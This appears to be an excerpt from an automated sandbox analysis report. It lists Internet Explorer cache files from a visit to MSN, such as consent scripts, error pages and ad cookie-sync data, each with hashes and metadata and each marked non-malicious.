                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BBMQmHU[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):389
                                                    Entropy (8bit):7.172427099901681
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7cIPH1Fo6TTPDnsxSMYz2jNtqwGAYWkixL:PI/1KwkSMYiptqwTPb
                                                    MD5:3E700D50C1629801F672F459CFD6CD4E
                                                    SHA1:03C0641ADB674F8FB607A8C6AD6FDC8C49F237DD
                                                    SHA-256:24A2FF64FA4F87C01A65C6817DF40A60353D4FC517567708EADE05770AF7DC2F
                                                    SHA-512:364E85CC304E2ADB3C0FEA43FD796F0E2D48890AB227787F6E036E599E1487DECF549B6485383AACDD24CD0E6EBD43DAD1E967540F0BB6330D3B323C80741AB0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMQmHU.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\BBRUB0d[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):489
                                                    Entropy (8bit):7.208309014650151
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7wmcW0JYErMXrLYTh/BBoqavcAccySLY:jmx0aaM7LYtTpaWcy4Y
                                                    MD5:C090E4C7C513884E6B10030FCE2F2B37
                                                    SHA1:2BE9AD7D8CE94A585F0EA58DBC0B0A9A9933E854
                                                    SHA-256:C18187F3EF7089F6EA948C35797228FC4DFD3F90DBD2E78E531C6D2A92740471
                                                    SHA-512:DA9A5F97B70845AECD6BA20F87DA7FC2D6947AC9E2CFBA299B402459CE5ED8A1AA918A140B11879038961A3FA6B986736813CD1707D05B4A1BB9C195F52005CE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\NewErrorPageTemplate[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1612
                                                    Entropy (8bit):4.869554560514657
                                                    Encrypted:false
                                                    SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                    MD5:DFEABDE84792228093A5A270352395B6
                                                    SHA1:E41258C9576721025926326F76063C2305586F76
                                                    SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                    SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\a5ea21[1].ico
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):758
                                                    Entropy (8bit):7.432323547387593
                                                    Encrypted:false
                                                    SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                    MD5:84CC977D0EB148166481B01D8418E375
                                                    SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                    SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                    SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\cfdbd9[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):740
                                                    Entropy (8bit):7.552939906140702
                                                    Encrypted:false
                                                    SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                    MD5:FE5E6684967766FF6A8AC57500502910
                                                    SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                    SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                    SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\checksync[1].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:dropped
                                                    Size (bytes):21552
                                                    Entropy (8bit):5.3052221077615584
                                                    Encrypted:false
                                                    SSDEEP:384:gIAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOHQWwY4RXrqt:R86qhbS2RpF3OsHQWwY4RXrqt
                                                    MD5:D0E1F91215881E5FA53C3B18262A9DFE
                                                    SHA1:B8C86EC6E6E94F5104E9A60DD286BC2E9F50C3BE
                                                    SHA-256:26A91F854D0E89589A8018D507B38F21CD27094E38F1894F215AEF20144D618B
                                                    SHA-512:01F394424DDA7F38B8978643C452B784144103D6E36C001B8B0DB70926C0577F75FBB5EE0EE7235B8582CDBFC3117E2ECFA8AF8A4DCCB72B1BE9FD6D4E040B0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\checksync[2].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:dropped
                                                    Size (bytes):21552
                                                    Entropy (8bit):5.3052221077615584
                                                    Encrypted:false
                                                    SSDEEP:384:gIAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOHQWwY4RXrqt:R86qhbS2RpF3OsHQWwY4RXrqt
                                                    MD5:D0E1F91215881E5FA53C3B18262A9DFE
                                                    SHA1:B8C86EC6E6E94F5104E9A60DD286BC2E9F50C3BE
                                                    SHA-256:26A91F854D0E89589A8018D507B38F21CD27094E38F1894F215AEF20144D618B
                                                    SHA-512:01F394424DDA7F38B8978643C452B784144103D6E36C001B8B0DB70926C0577F75FBB5EE0EE7235B8582CDBFC3117E2ECFA8AF8A4DCCB72B1BE9FD6D4E040B0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\de-ch[1].json
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):79097
                                                    Entropy (8bit):5.337866393801766
                                                    Encrypted:false
                                                    SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                    MD5:408DDD452219F77E388108945DE7D0FE
                                                    SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                    SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                    SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                    Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dnserror[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):2997
                                                    Entropy (8bit):4.4885437940628465
                                                    Encrypted:false
                                                    SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                    MD5:2DC61EB461DA1436F5D22BCE51425660
                                                    SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                    SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                    SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):748
                                                    Entropy (8bit):7.249606135668305
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                    MD5:C4F558C4C8B56858F15C09037CD6625A
                                                    SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                    SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                    SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):12105
                                                    Entropy (8bit):5.451485481468043
                                                    Encrypted:false
                                                    SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                    MD5:9234071287E637F85D721463C488704C
                                                    SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                    SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                    SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                    Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http___cdn.taboola.com_libtrc_static_thumbnails_9f7f4a3b7988491d30517f3692cbc88d[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):46291
                                                    Entropy (8bit):7.978820186098384
                                                    Encrypted:false
                                                    SSDEEP:768:E25BbRVX8QQSe+t80EjGq1tKzTCE+2gBBeRQe6P8xmnxL3pHliZwB96:E25BbRVX8QQSe1qq1c3CE+rei5ZLn6
                                                    MD5:7298CBD2DDF984F6E15BC13150C30A5A
                                                    SHA1:C6CAC4DD81C94D8D9A8CE35F3368628CDC689212
                                                    SHA-256:15FB01E0F45754B06F9A23CAD38E323867FAF88AC3DAAAAF8238EA657CB3F97C
                                                    SHA-512:B510B20D48AC17875E176069DE4E62D365E3C7D242A0578CE1F8AA5B0ADA90911229D3D72844B862AEE7E7F314B111CC8222B2DC3733F2AD0EFCF2A3791EC570
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F9f7f4a3b7988491d30517f3692cbc88d.jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\iab2Data[1].json
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):242382
                                                    Entropy (8bit):5.1486574437549235
                                                    Encrypted:false
                                                    SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                    MD5:D76FFE379391B1C7EE0773A842843B7E
                                                    SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                    SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                    SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                    Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\location[1].js
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):182
                                                    Entropy (8bit):4.685293041881485
                                                    Encrypted:false
                                                    SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                    MD5:C4F67A4EFC37372559CD375AA74454A3
                                                    SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                    SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                    SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                    Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\otBannerSdk[1].js
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):374818
                                                    Entropy (8bit):5.338137698375348
                                                    Encrypted:false
                                                    SSDEEP:3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
                                                    MD5:2E5F92E8C8983AA13AA99F443965BB7D
                                                    SHA1:D80209C734F458ABA811737C49E0A1EAF75F9BCA
                                                    SHA-256:11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
                                                    SHA-512:A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
                                                    Preview: /** .. * onetrust-banner-sdk.. * v6.13.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var r=function(){return(r=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i||[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\otSDKStub[1].js
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):16853
                                                    Entropy (8bit):5.393243893610489
                                                    Encrypted:false
                                                    SSDEEP:192:2Qp/7PwSgaXIXbci91iEBadZH8fKR9OcmIQMYOYS7uzdwnBZv7iIHXF2FsT:FRr14FLMdZH8f4wOjawnTvuIHVh
                                                    MD5:82566994A83436F3BDD00843109068A7
                                                    SHA1:6D28B53651DA278FAE9CFBCEE1B93506A4BCD4A4
                                                    SHA-256:450CFBC8F3F760485FBF12B16C2E4E1E9617F5A22354337968DD661D11FFAD1D
                                                    SHA-512:1513DCF79F9CD8318109BDFD8BE1AEA4D2AEB4B9C869DAFF135173CC1C4C552C4C50C494088B0CA04B6FB6C208AA323BFE89E9B9DED57083F0E8954970EF8F22
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
                                                    Preview: var OneTrustStub=function(e){"use strict";var t,o,n,i,a,r,s,l,c,p,u,d,m,h,f,g,b,A,C,v,y,I,S,w,T,L,R,B,D,G,E,P,_,U,k,O,F,V,x,N,H,M,j,K=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[o.ConfirmChoiceButton
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\poweredBy_ot_logo[1].svg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):2998
                                                    Entropy (8bit):4.189711652602748
                                                    Encrypted:false
                                                    SSDEEP:48:B82lNUshFh5tRJHnZgG78YqA9vUrpvMpfapJa4PE1vMtwD3wAjFH8mS6GphIw7pt:flNUsh75tRJHVhB9sWpypJbE10uD31Bg
                                                    MD5:2E9B9AC8BE368C1EFCC51965C74BE43B
                                                    SHA1:DDE87F63ECBAEB97C5708CED6FFD0E7DE5A806C0
                                                    SHA-256:49B9B4996D1FF0A8E3DE643A0C623255BF631F298F2799B949C29DE93926EE7A
                                                    SHA-512:FFC56944E751D82233F3ED504EB42A44544CB4E58969E8AC3ABD76D96C0607282FEE0E52F13AED8902B05330E0C82E74BA8592FF2BDCBF0188BE8898EFB2C741
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/logos/static/poweredBy_ot_logo.svg
